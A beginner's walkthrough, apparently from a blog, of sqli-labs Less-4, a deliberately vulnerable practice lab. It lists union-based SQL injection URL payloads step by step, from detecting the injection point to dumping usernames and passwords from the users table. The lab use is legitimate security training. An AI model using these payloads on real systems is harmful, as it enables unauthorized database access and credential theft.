sqli-labs-less-4圖文詳解，適合小白

Less-4

less1-3以釋出，1-4題相關知識點在https://blog.csdn.net/qq_46432288/article/details/109226871中，點選檢視吧！！！
less-4與1-3方法基本一致，只是最開始的判斷注入點有一點差別。

判斷注入：

http://127.0.0.1/sqli-labs-master/Less-4/?id=1 顯示正常

http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 顯示正常
http://127.0.0.1/sqli-labs-master/Less-4/?id=1’’ 顯示正常（兩個單引號）
http://127.0.0.1/sqli-labs-master/Less-4/?id=2" 顯示錯誤（一個雙引號），錯誤：’“2"”) LIMIT 0,1’，出現一個）

http://127.0.0.1/sqli-labs-master/Less-4/?id=2")–+ 顯示正常，判斷原資料輸入後應該為(“id”)

判斷欄位列數：

http://127.0.0.1/sqli-labs-master/Less-4/?id=2") order by 10 --+

顯示Unknown column ‘10’ in ‘order clause’，說明欄位列數少於10，繼續縮小數值進行測試。
http://127.0.0.1/sqli-labs-master/Less-4/?id=2") order by 3 --+ 正常顯示，表明欄位列數為3

判斷可回顯位：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,3 --+

判斷當前資料庫：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,database() --+

判斷當前使用者：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,user() --+

檢視所有資料庫：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(schema_name) from information_schema.schemata --+

檢視當前資料庫中的所有表：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+

檢視users表中的欄位：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+

輸出username：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(username) from security.users --+

輸出password:

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(password) from security.users --+

將username和password連線並聯合輸出：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(concat_ws(’~’,username,password)) from security.users --+

Less-4結束

。。。未完待續